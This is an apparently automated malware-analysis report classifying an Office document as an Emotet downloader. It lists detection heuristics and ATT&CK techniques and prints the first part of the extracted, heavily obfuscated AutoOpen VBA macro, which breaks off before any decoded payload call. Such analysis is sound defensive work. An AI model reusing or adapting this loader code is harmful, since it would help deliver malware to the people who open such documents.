Verdict: MALICIOUS
Risk Score: 302
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1140 Deobfuscate/Decode Files or Information
The sample exhibits multiple high and critical heuristic firings indicating an obfuscated auto-executing VBA loader, including GetObject calls and p-code execution tokens. ClamAV detection confirms this is a known Emotet downloader variant. The VBA script, though heavily obfuscated, is characteristic of Emotet's downloader behaviour: it downloads and executes a second-stage payload.
Heuristics (9)
- ClamAV: Doc.Downloader.Emotet-6863642-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6863642-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code.
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro present.
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call present.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 73965 bytes |

SHA-256 of macros.bas: f9dc5329a9a7efcc6310c51285741381ffda1277ac02f89c25e60dc85a8b6e00

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "M___9_17"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "R279943"
Function W78754()
b999839 = 964093313 - 790492610
w_615254 = 281843914 + X42__0
Select Case C_____49
Case 281442124
t3_9_7 = Chr(783805656 * Tan(L__9452))
o5_219_ = Z4171_25
Case 998050343
S52_484 = l89_27
o350_9 = i___8_5
Case 561485423
Z4__75 = 901535213
w93680 = q4_90_7
End Select
E_563899 = 618650112 - 570557927
o760_2 = 278204608 + u198_3
Select Case E_43__
Case 849917359
w____0_ = Chr(179104655 * Tan(I94_73_))
l_55768_ = B88_636_
Case 304978203
p570_9 = o1__22
c557__4 = h0_916
Case 594614811
v8_08__ = 765669961
I_7__8_6 = V_2295_
End Select
j__5641 = 968391338 - 434831068
U_73_6_ = 762869376 + t55_5_4
Select Case G13485
Case 869518904
O48_72 = Chr(990636761 * Tan(s_184__))
V724__4 = L7__238
Case 490883433
H_3__865 = p45_97_
W9840__7 = s__729_
Case 203271845
n69100 = 941792175
M0777_ = i82_270
End Select
U_27__4 = 410638304 - 226185383
m1312204 = 372662241 + X5_6101
Select Case q_46__
Case 913580008
o_557_21 = Chr(155339587 * Tan(m5_7_7))
R096062_ = H53079_5
Case 126455408
P1897571 = V249239
S25412_1 = X75__1
Case 670043029
M20__3_3 = 977161649
X6937_ = a8758_62
End Select
b87701 = 642133596 - 410654228
f_5707 = 444905912 + f_736037
Select Case P_035_5_
Case 119073590
H__000 = Chr(194337218 * Tan(b_9348))
E_79867 = n_767528
Case 467876948
c__18_7 = c_____
h8867_ = V_1880
Case 766947059
p6_72__ = 45677177
r39691_ = J42_1_2_
End Select
O62720 = 15140262 - 606241399
J__6_8 = 245115582 + M8_16___
Select Case d8_866_
Case 191090454
r5048_ = Chr(18694950 * Tan(t_206_8))
k94_314 = L813574
Case 168566280
Y80_361_ = U___573_
j1_5_3 = b073_02_
Case 40248200
W24__1 = 435751948
q_473_ = c521_54
End Select
B6_3_863 = 336509501 - 885396307
w__7726 = 251208046 + f_89_2__
Select Case p24_6814
Case 625226632
R4_1_6 = Chr(10001131 * Tan(S3_2__))
c4563_ = l31_229_
Case 902219164
n910__9 = R316___
j262344_ = L8_386_9
Case 517067101
h971882 = 668172797
U4_423 = o7_7932
End Select
Q2_033_ = 891207631 - 763977458
T3_7_2 = 21474711 + f675_61
Select Case Y17891_8
Case 750739630
f__886 = Chr(73082833 * Tan(s68_3__))
u_22151 = f__55_6_
Case 718747528
p6591117 = n22__51
j8_879_8 = V627__7
Case 508001758
A4827_ = 670695557
a864__6 = q_38__4_
End Select
End Function
Function U___648(E00243__, z_33_61)
On Error Resume Next
L771989_ = 969600506 - 164771385
Z599_39_ = 273528226 + S246___8
Select Case t278_5_
Case 622549525
U_03__ = Chr(233002850 * Tan(V065_2))
I_11923 = I13__4
Case 489822154
i720_9 = v_7_96
i__2_079 = I0697_8
Case 562872967
O7_6_53 = 343726147
b05_47_ = v172576
End Select
A767_4_ = 888531924 - 718454726
h_93_39 = 732739377 + K5_513
Select Case Y5_71_73
Case 542682796
A566__2 = Chr(807013324 * Tan(l9403_))
J_1634_ = v___92
Case 194258582
n__7_6_9 = l__15867
K377031 = E815513
Case 835756170
h9874_ = 443881288
T3400_09 = m06_30
End Select
Set t_9903 = G
... (truncated)